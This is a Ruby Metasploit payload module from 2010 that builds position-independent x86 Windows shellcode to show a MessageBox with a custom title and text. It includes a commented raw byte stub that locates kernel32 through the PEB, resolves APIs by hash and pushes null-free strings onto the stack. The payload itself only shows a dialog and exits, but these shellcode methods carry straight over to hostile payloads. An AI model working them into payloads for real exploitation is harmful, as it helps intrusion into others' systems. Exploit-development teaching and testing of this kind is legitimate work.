
# Title : Shellcode - Win32 MessageBox (Metasploit module)
# Published : 2010-03-24
# Author : corelanc0d3r


##
# $Id: messagebox.rb 4 2010-02-26 00:28:00:00Z corelanc0d3r & rick2600 $
##
#
#  Installation instructions :
#  Drop file in framework3/modules/payloads/singles/windows folder
#
# Usage :   ./msfpayload windows/messagebox TITLE="Corelan" TEXT="Greetz to corelanc0d3r" P
#

require 'msf/core'
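module Metasploit3

  include Msf::Payload::Windows
  include Msf::Payload::Single

  # Longest TITLE / TEXT value that can be null-terminated correctly.
  #
  # The terminating null is stored with "mov byte [esp+disp8], reg"
  # (0x88 0x5C 0x24 disp8 / 0x88 0x4C 0x24 disp8). disp8 is a *signed*
  # 8-bit displacement: an index of 128 or more is sign-extended to a
  # negative offset and the store lands below esp instead of at the end
  # of the string, which then runs on into whatever follows it on the
  # stack. The null index equals the string length (see
  # build_push_string), so 127 is the real limit, not the 255 quoted by
  # the original option text.
  MAX_STRING_LENGTH = 127

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Windows Messagebox with custom title and text',
      'Version'       => '$Revision: 4 $',
      'Description'   => 'Spawns MessageBox with a customizable title & text',
      'Author'        => [ 'corelanc0d3r - peter.ve[at]corelan.be',
                           'rick2600 - ricks2600[at]gmail.com' ],
      'License'       => BSD_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X86,
      'Privileged'    => false,
      'Payload'       =>
        {
          'Offsets' => { },
          # Position-independent stub (x86):
          #   fldpi / fstenv [esp-0xc]  -> GetPC
          #   PEB -> Ldr -> InInitializationOrderModuleList, take the
          #   module whose BaseDllName is 12 characters (kernel32.dll);
          #   NOTE(review): this lookup is OS/version dependent - verify
          #   on the target.
          #   ROR13 hash export resolver (pushad ... popad; ret), called
          #   with [base, hash] on the stack, result in eax.
          #   Resolves LoadLibraryA (hash 0xec0e4e8e) into [ebp+4] and
          #   ends on 0xbb = "mov ebx, imm32"; generate appends the
          #   exit-function hash as that immediate.
          'Payload' =>    "\xd9\xeb\x9b\xd9\x74\x24\xf4\x31"+
                          "\xd2\xb2\x7a\x31\xc9\x64\x8b\x71"+
                          "\x30\x8b\x76\x0c\x8b\x76\x1c\x8b"+
                          "\x46\x08\x8b\x7e\x20\x8b\x36\x38"+
                          "\x4f\x18\x75\xf3\x59\x01\xd1\xff"+
                          "\xe1\x60\x8b\x6c\x24\x24\x8b\x45"+
                          "\x3c\x8b\x54\x05\x78\x01\xea\x8b"+
                          "\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"+
                          "\x37\x49\x8b\x34\x8b\x01\xee\x31"+
                          "\xff\x31\xc0\xfc\xac\x84\xc0\x74"+
                          "\x0a\xc1\xcf\x0d\x01\xc7\xe9\xf1"+
                          "\xff\xff\xff\x3b\x7c\x24\x28\x75"+
                          "\xde\x8b\x5a\x24\x01\xeb\x66\x8b"+
                          "\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b"+
                          "\x04\x8b\x01\xe8\x89\x44\x24\x1c"+
                          "\x61\xc3\xb2\x08\x29\xd4\x89\xe5"+
                          "\x89\xc2\x68\x8e\x4e\x0e\xec\x52"+
                          "\xe8\x9c\xff\xff\xff\x89\x45\x04"+
                          "\xbb"
        }
      ))

    # The generic EXITFUNC option is replaced with a restricted one:
    # only ExitProcess and ExitThread hashes are wired into the stub.
    deregister_options('EXITFUNC')

    register_options(
      [
        OptString.new('EXITFUNC', [ false,
          "Only Process (default) or Thread are supported", "process" ]),
        OptString.new('TITLE', [ true,
          "Messagebox Title (max #{MAX_STRING_LENGTH} chars)" ]),
        OptString.new('TEXT', [ true,
          "Messagebox Text (max #{MAX_STRING_LENGTH} chars)" ])
      ], self.class)
  end

  #
  # Constructs the payload: resolver stub, exit-function lookup,
  # LoadLibraryA("user32.dll"), MessageBoxA lookup, TITLE and TEXT
  # pushed onto the stack, MessageBoxA(0, text, title, 0), exit(0).
  #
  # Raises ArgumentError when TITLE or TEXT is missing or longer than
  # MAX_STRING_LENGTH (see the constant for why the limit is 127).
  #
  def generate
    title = datastore['TITLE']
    text  = datastore['TEXT']
    raise ArgumentError, "TITLE is required" if title.nil?
    raise ArgumentError, "TEXT is required" if text.nil?
    if title.length > MAX_STRING_LENGTH
      raise ArgumentError, "TITLE must be #{MAX_STRING_LENGTH} characters or less"
    end
    if text.length > MAX_STRING_LENGTH
      raise ArgumentError, "TEXT must be #{MAX_STRING_LENGTH} characters or less"
    end

    # ExitThread() hash only when EXITFUNC is "thread"; every other value
    # (including the "process" default) selects ExitProcess().
    exit_func = (datastore['EXITFUNC'] || "process").downcase
    if exit_func == "thread"
      exit_hash = "\xEF\xCE\xE0\x60"   # ExitThread()  0x60e0ceef
    else
      exit_hash = "\x7e\xd8\xe2\x73"   # ExitProcess() 0x73e2d87e
    end

    push_title, title_index = build_push_string(title)
    push_text,  text_index  = build_push_string(text)

    # Resolve the exit function: the stub left 0xbb ("mov ebx, imm32")
    # as its last byte, so the hash becomes that immediate.
    payload_data = module_info['Payload']['Payload']
    payload_data += exit_hash
    payload_data += "\x87\x1c\x24"                  # xchg [esp], ebx   (hash onto stack, kernel32 base into ebx)
    payload_data += "\x52\xe8\x8b\xff\xff\xff"      # push edx; call resolver -> eax = exit function
    payload_data += "\x89\x45\x08"                  # mov [ebp+8], eax

    # "user32.dll" on the stack, null-free: the byte after "dll" is
    # pushed as 0xff and then overwritten with bl, which is the low byte
    # of the 64K-aligned kernel32 base and therefore 0x00.
    payload_data += "\x68\x6c\x6c\x20\xff"          # push "ll \xff"
    payload_data += "\x68\x33\x32\x2e\x64"          # push "32.d"
    payload_data += "\x68\x75\x73\x65\x72"          # push "user"
    payload_data += "\x88\x5c\x24\x0a"              # mov byte [esp+0xa], bl
    payload_data += "\x89\xe6\x56\xff\x55\x04"      # mov esi, esp; push esi; call [ebp+4] = LoadLibraryA

    # Resolve MessageBoxA (hash 0xbc4da2a8) from the user32 base in eax.
    payload_data += "\x89\xc2\x50"                  # mov edx, eax; push eax
    payload_data += "\xbb\xa8\xa2\x4d\xbc"          # mov ebx, 0xbc4da2a8
    payload_data += "\x87\x1c\x24\x52"              # xchg [esp], ebx; push edx
    payload_data += "\xe8\x5e\xff\xff\xff"          # call resolver -> eax = MessageBoxA

    # Title: push the bytes, drop the real null over the "X" placeholder,
    # keep the pointer in ebx.
    payload_data += push_title
    payload_data += "\x31\xDB\x88\x5C\x24"          # xor ebx, ebx; mov byte [esp+disp8], bl ...
    payload_data += [title_index].pack('C')         # ... disp8 = index of the "X"
    payload_data += "\x89\xe3"                      # mov ebx, esp

    # Text: same scheme, pointer kept in ecx.
    payload_data += push_text
    payload_data += "\x31\xc9\x88\x4C\x24"          # xor ecx, ecx; mov byte [esp+disp8], cl ...
    payload_data += [text_index].pack('C')          # ... disp8 = index of the "X"
    payload_data += "\x89\xe1"                      # mov ecx, esp

    # MessageBoxA(hWnd=0, lpText=ecx, lpCaption=ebx, uType=0), then
    # ExitProcess/ExitThread(0).
    payload_data += "\x31\xd2\x52"                  # xor edx, edx; push edx (uType)
    payload_data += "\x53\x51\x52"                  # push ebx; push ecx; push edx (hWnd)
    payload_data += "\xff\xd0"                      # call eax
    payload_data += "\x31\xc0\x50\xff\x55\x08"      # xor eax, eax; push eax; call [ebp+8]

    return payload_data
  end

  #
  # Emits the "push imm32" sequence that places +str+ on the stack as a
  # contiguous, null-free byte run.
  #
  # An "X" placeholder is appended where the terminating null belongs and
  # the result is padded with spaces to a multiple of four, so no 4-byte
  # immediate contains 0x00. Groups are pushed last-to-first so the bytes
  # sit in order at [esp] afterwards; the caller then stores a real null
  # at [esp+index], where index == str.length.
  #
  # NOTE(review): lengths and slices are per character, not per byte; a
  # multi-byte (non-ANSI) character would make a group longer than four
  # bytes and corrupt the push - confirm TITLE/TEXT are single-byte.
  #
  # Returns [opcodes, index].
  #
  def build_push_string(str)
    padded = str + "X"
    null_index = padded.length - 1
    padded += " " * ((4 - padded.length % 4) % 4)   # 4-byte aligned, never empty
    opcodes = ""
    # padded.length is a multiple of 4 and at least 4, so this visits
    # every group exactly once, last group first.
    (padded.length - 4).step(0, -4) do |pos|
      opcodes += "\x68" + padded[pos, 4]            # push imm32
    end
    return [ opcodes, null_index ]
  end
end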